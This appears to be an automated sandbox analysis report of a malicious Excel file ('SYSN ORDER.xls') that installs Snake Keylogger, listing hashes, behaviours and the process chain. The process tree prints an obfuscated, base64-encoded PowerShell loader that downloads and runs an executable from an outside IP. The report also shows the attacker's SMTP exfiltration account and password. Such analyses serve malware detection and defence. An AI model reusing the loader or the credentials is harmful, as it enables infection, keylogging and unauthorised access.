Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
30-09-2024 09:28
Static task
static1
Behavioral task
behavioral1
Sample
SYSN ORDER.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
SYSN ORDER.xls
Resource
win10v2004-20240802-en
General
-
Target
SYSN ORDER.xls
-
Size
641KB
-
MD5
673bd0aa988ca4a1ef05edb3d5b68d60
-
SHA1
4b7d31c4d6a4cd94e95fdd7c35bca86f6e13ec38
-
SHA256
9db5ab81cbe373ea471f128ad2fdc98c9eb98c1ff3991046f7ca54823d9a6107
-
SHA512
0af25507fd68eb9e8a9df4b1a93f6fad31429d0c0d37d326482ace999f5859f18ef3521c7e71146f41afcf45e7bbaf0d1d77543cc8abfb9c38ac2057cca9929c
-
SSDEEP
12288:GOyBFRSc/ol3o3+io8tM7qgSwaY0c6bde1bmnyqkZH1:GTBShxE+iokM7qgadcgdwmlkZ
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.teilecar.com - Port:
587 - Username:
[email protected] - Password:
Manta924porsche=911 - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 4 IoCs
resource yara_rule behavioral1/memory/2952-67-0x0000000000090000-0x00000000000B6000-memory.dmp family_snakekeylogger behavioral1/memory/2952-72-0x0000000000090000-0x00000000000B6000-memory.dmp family_snakekeylogger behavioral1/memory/2952-75-0x0000000000090000-0x00000000000B6000-memory.dmp family_snakekeylogger behavioral1/memory/2952-68-0x0000000000090000-0x00000000000B6000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 3 IoCs
flow pid Process 10 2552 mshta.exe 11 2552 mshta.exe 13 2392 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2392 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1160 dllhost.exe -
Loads dropped DLL 1 IoCs
pid Process 2392 powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0006000000019613-58.dat autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1160 set thread context of 2952 1160 dllhost.exe 38 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2208 2952 WerFault.exe 38 -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2692 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2392 powershell.exe 2392 powershell.exe 2392 powershell.exe 2952 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1160 dllhost.exe 1160 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2392 powershell.exe Token: SeDebugPrivilege 2952 RegSvcs.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2692 EXCEL.EXE 2692 EXCEL.EXE 2692 EXCEL.EXE 2692 EXCEL.EXE 2692 EXCEL.EXE -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 2552 wrote to memory of 2908 2552 mshta.exe 32 PID 2552 wrote to memory of 2908 2552 mshta.exe 32 PID 2552 wrote to memory of 2908 2552 mshta.exe 32 PID 2552 wrote to memory of 2908 2552 mshta.exe 32 PID 2908 wrote to memory of 2392 2908 cmd.exe 34 PID 2908 wrote to memory of 2392 2908 cmd.exe 34 PID 2908 wrote to memory of 2392 2908 cmd.exe 34 PID 2908 wrote to memory of 2392 2908 cmd.exe 34 PID 2392 wrote to memory of 1396 2392 powershell.exe 35 PID 2392 wrote to memory of 1396 2392 powershell.exe 35 PID 2392 wrote to memory of 1396 2392 powershell.exe 35 PID 2392 wrote to memory of 1396 2392 powershell.exe 35 PID 1396 wrote to memory of 1588 1396 csc.exe 36 PID 1396 wrote to memory of 1588 1396 csc.exe 36 PID 1396 wrote to memory of 1588 1396 csc.exe 36 PID 1396 wrote to memory of 1588 1396 csc.exe 36 PID 2392 wrote to memory of 1160 2392 powershell.exe 37 PID 2392 wrote to memory of 1160 2392 powershell.exe 37 PID 2392 wrote to memory of 1160 2392 powershell.exe 37 PID 2392 wrote to memory of 1160 2392 powershell.exe 37 PID 1160 wrote to memory of 2952 1160 dllhost.exe 38 PID 1160 wrote to memory of 2952 1160 dllhost.exe 38 PID 1160 wrote to memory of 2952 1160 dllhost.exe 38 PID 1160 wrote to memory of 2952 1160 dllhost.exe 38 PID 1160 wrote to memory of 2952 1160 dllhost.exe 38 PID 1160 wrote to memory of 2952 1160 dllhost.exe 38 PID 1160 wrote to memory of 2952 1160 dllhost.exe 38 PID 1160 wrote to memory of 2952 1160 dllhost.exe 38 PID 2952 wrote to memory of 2208 2952 RegSvcs.exe 39 PID 2952 wrote to memory of 2208 2952 RegSvcs.exe 39 PID 2952 wrote to memory of 2208 2952 RegSvcs.exe 39 PID 2952 wrote to memory of 2208 2952 RegSvcs.exe 39
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\SYSN ORDER.xls"1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2692
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3jimymcx.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF75.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFF74.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:1588
-
-
-
C:\Users\Admin\AppData\Roaming\dllhost.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 9726⤵
- Program crash
PID:2208
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57fb5fa1534dcf77f2125b2403b30a0ee
SHA1365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA25633a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD592f93792ea806d178383cb9c70bd2e26
SHA1ee610cb7611dff0649dab886e78b24f06ea8824c
SHA256c9503873ee79df3e9097d50783c0a3ad0eb843bff50444b6c9551d8cef86e1e2
SHA512c78d97b8633618d6b7a20700ce2db9897646ea10954d088efa2a934274a8c9e3b868ffe6491440ae3817116a12e84e32c533b6dc3f21074743f7507322f1dcf3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5b43ec613852f55aa35ff7debd7323764
SHA19798c4022472cf98819cfbcd9f4a12c557bdb987
SHA256e0a3df2aa68aab1f41ef3ae693cc41e66986d9e83f7efa9e7d8ebea811ab6c49
SHA512d8004df4ec4950b46a62be2df37bbb24082414dfdcd2a4df52d4cb950bc4cabed1d96a9fba4d393c4e26a44cbde0a2d391b0d0579c0311f56008416259e00471
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD5e71bf94794c3a3c80ea8531c16ec988b
SHA1f2a9a0c156788922f86b9008b0aa0c525afecd91
SHA256f3ee403d79ea6f3fa638b3fe5c46889ec785a0240786349144544921dcf94539
SHA51228841ec796f18b794a89cbb2f51ec3f14ba150b00155561764362c43348e2a4c1d9425ff7163dfbbe4072e6f261b621b23a2a51b1418375ce73b066660701974
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\IEnetbokkworkingforupdate[1].hta
Filesize8KB
MD5a63beaf7df124ec89423ccb526998fc1
SHA1397e973479a8e70b3ea6cea2c5a6f4d796364f40
SHA2562e07806ea40e3109f56707486bdb89ba38b7854ea97b988be7dcc9c77a4d2c20
SHA512603d03c65f5c62093bc217b084120d8bf0dcd801d8cc6415f2acaa9ceaeac2e433dfd91383835a7532f29652d69ef801f662f913c0d2518629170d9338889c62
-
Filesize
3KB
MD541d485ca66acf46399fbd47df0da0170
SHA19c099baf2fc99a8a3bd895c9c6234ff8d1fa8661
SHA256066c2967ec959f80d2d166e7a1a41053c5a051b4eef3984c0bbc78ecf9c74750
SHA5126495827ab4d74d4ba95681a69e12192004bd64064aef81bb1ad6fe6427103a9f11425cab365315655355a82dd7b271450935afe521c8ddd854281368df6bf6e0
-
Filesize
7KB
MD57d5700e78f5ae1bba4303e2907d33363
SHA1ba695a0017bcf9d8eb6e8a10d42d06e11599ef25
SHA2569b697aad10a5fcd670b99df0b23df9a7247a6c57b6f5479cf7dd474d5512af63
SHA512503405dac9f273144ae747ac49103fb4405498af204b9f85c951813bbbffd6453f3c90c7e00f1bf86cef7a5f4b4e4598b2e799b09136191f2af6eeb05537fc08
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD547c974031c21e6895694eb4bd5eeb77f
SHA1eceac48583554483e41c39645753e53ed29f186f
SHA25614000240b6a4528b73a7545addceaebd4b8e0aa21a19616be07cdecb27929a85
SHA5125d7bd4c77971cfc00e5c6e266b9af712dd8856da203e4e8042219180e731b315ec91cda62bebf496e4a4e754f1b609628a42cca1f4db45f7f8421b302d94f00c
-
Filesize
1004KB
MD57f0098dcc054a27f80296adf300573ec
SHA194bd05a8f7b8b79750025d0e9b6407beb2b85c89
SHA256468981a4e110bca0fa99eb08c2fbda0e1482cf8ef5fbb3adcf82db6609aede24
SHA512904adfade566e1404d1d07ec1eb6141e06abdc0b74a803946294124f485f7260de2cbdde32f2abaaa96c0c25f3b476d39887502d5f304b3bc346d314119b1d77
-
Filesize
474B
MD5006d2bdbc05adf8dd13c8c672f8d8bdf
SHA163a2f1d74d732f474251c0278f91df47e3872caf
SHA256979007d0b68b1e466e58daec48283b65d3778cfdae6a40819309d85f0f624a96
SHA512762fef864ad0ff9a168b6925934af3b6b90b0c053da6a62efec831ae9fd2fe54de935851178ec658937b316c2218e79f2d2c49a0c5a84478cdd662c6d72b47ea
-
Filesize
309B
MD52c5a24b6417fef3214ac0cf05cde78da
SHA196070af6b81b23b83b789acdef8c13cef8fdf710
SHA256b6aa9dbb6ddaf0590b20ca87584a00db2befd20df8a17db57ee62b40ad8c83c0
SHA512ef13a8ea44239cb7008431386bd87e0db021b2e2c2dba28ff5abba8a8c010f0e8d6742fed5dda132066a460f43122e64508e190d5fd66e21873da0f6d6f7317b
-
Filesize
652B
MD5a2ad4911c244e02e86a7de70c59ed2ca
SHA17fad0f60417dc3041654bf56db258ff4d3f2bfe7
SHA256371c2be9f4d8194232c73b511e0269fca19a8625a75a9753f73ee766d54ebf09
SHA51267ac47cf7ed6e70145506a860c1895de6af7c5bd72e3fc1b9c51db89c380accec6f6d62f12b8d08936e270db2c3cb2a11d1733a2ef4760b0e618411f6bfb2485